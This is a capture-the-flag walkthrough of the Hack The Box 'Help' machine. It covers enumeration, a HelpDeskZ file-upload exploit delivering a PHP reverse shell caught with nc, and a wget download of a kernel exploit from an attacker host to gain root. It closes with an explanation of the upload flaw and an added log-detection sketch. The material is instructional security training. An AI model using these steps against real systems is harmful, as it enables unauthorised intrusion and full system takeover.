HTB Help — Walkthrough

Vaibhav Joshi
Jun 8, 2019

Enumeration

Let’s start enumeration with an nmap scan:

root@ArmourInfosec:/ nmap -sV 10.10.10.121
Nmap scan report for 10.10.10.121 (10.10.10.121)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit port 80 and see what’s going on there.

Just the Apache default index file, nothing else.

Let’s try gobuster with a small wordlist:

root@ArmourInfosec:/ gobuster -u http://10.10.10.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/01 08:45:18 Starting gobuster
=====================================================
/support (Status: 301)
/javascript (Status: 301)
=====================================================
2019/05/01 08:45:50 Finished
=====================================================

When we visit http://10.10.10.121/support, there is the “HelpDeskZ :: Support Ticket System”.

OK, so let’s search for any exploit for it:

root@ArmourInfosec:/ searchsploit helpdeskz

Arbitrary file upload looks interesting because it’s unauthenticated.

Exploitation

Let’s try to exploit it

According to the exploit, when we upload a ticket with a php file (or a file with some of the other extensions), it shows “File is not allowed”, but the file is still uploaded and saved to a special location under “http://10.10.10.121/support/uploads/tickets” with a hashed name, and we can get the link with the exploit. So let’s try: I’m going to upload a php reverse shell as “1.php” (remember to change the IP and port in the shell file if you are also using a reverse shell). Visit

http://10.10.10.121/support/?v=submit_ticket&action=confirmation

Fill in all fields, then select the shell file and click upload; it shows “File is not allowed”.

Then we run the exploit:

root@ArmourInfosec:/ python 40300.py http://10.10.10.121/support/uploads/tickets/ 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help
$ cat user.txt

Privilege Escalation

We got the user. For root, let’s first get a tty shell. For that I follow the guif.re linux eop, so a simple command:

$ python -c 'import pty;pty.spawn("/bin/bash")'

We got the tty shell

Now let’s gather some information about the machine like kernel version etc.

So for that:

help@help:/$ uname -a

Its kernel version is 4.4.0-116, so let’s find some exploits for this:

root@ArmourInfosec:/ searchsploit linux 4.4.0-116

Here is a Local Privilege Escalation exploit.

Let’s upload it to the victim machine. I will do it with a web server.

On the attacker machine:

root@ArmourInfosec:/ python -m SimpleHTTPServer 80

On the victim machine:

help@help:/$ cd /tmp
help@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.c
help@help:/$ ./a.out

As soon as you run it you will get the root user.

help@help:/$ cd /root
help@help:/$ cat root.txt

And you got the root!!!!!!!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

What is the HelpDeskZ exploit doing?

The system saves the disallowed file to the tickets directory under a special name: it takes the current time, converts it to a string, combines it with the filename, computes the MD5 hash of the result, and saves the file under that name. The script simply reconstructs that name and gives us the exact link, the one where the response is “200 FOUND”.
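From the defender’s side, the name guessing described above shows up in the web server’s access log as a run of 404s for 32-hex-character names under the tickets upload path, ending in a 200. A detection sketch for that pattern, added here as an example (not code from the original post or from HelpDeskZ); the Apache combined log format, the threshold, the function names and the sample log lines are constructed assumptions:

```python
import hashlib
import re
from collections import defaultdict

# Request for a file whose name is exactly 32 hex characters (an MD5 digest)
# under the upload directory named in the walkthrough.
PROBE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) '
    r'(/support/uploads/tickets/[0-9a-f]{32}\.\w+)[^"]*" (\d{3})'
)
SCRIPT_EXTS = {"php", "phtml", "php5"}  # assumed list of server-executed types


def find_name_guessing(lines, min_misses=20):
    """Return clients with >= min_misses 404s on hashed upload names."""
    misses, hits = defaultdict(int), defaultdict(list)
    for line in lines:
        m = PROBE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        if status == "404":
            misses[ip] += 1
        elif status == "200":
            hits[ip].append(path)
    return {
        ip: {
            "misses": n,
            "hits": hits[ip],
            # A 200 on a script extension: an uploaded file is reachable as code.
            "script_served": any(p.rsplit(".", 1)[1] in SCRIPT_EXTS for p in hits[ip]),
        }
        for ip, n in misses.items() if n >= min_misses
    }


def build_sample_log():
    """Constructed log lines: one guessing client, one normal download."""
    def line(ip, seed, ext, status):
        name = hashlib.md5(seed.encode()).hexdigest()
        return (f'{ip} - - [01/May/2019:09:00:00 +0000] '
                f'"GET /support/uploads/tickets/{name}.{ext} HTTP/1.1" {status} 512')
    log = [line("192.0.2.10", f"miss{i}", "php", 404) for i in range(30)]
    log.append(line("192.0.2.10", "hit", "php", 200))
    log.append(line("198.51.100.7", "photo", "png", 200))
    return log


if __name__ == "__main__":
    for ip, info in find_name_guessing(build_sample_log()).items():
        print(ip, info["misses"], "misses,", len(info["hits"]), "hit(s)")
```

Stored names drawn from a CSPRNG, and rejecting a disallowed upload before anything is written to disk, remove the condition this detects.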
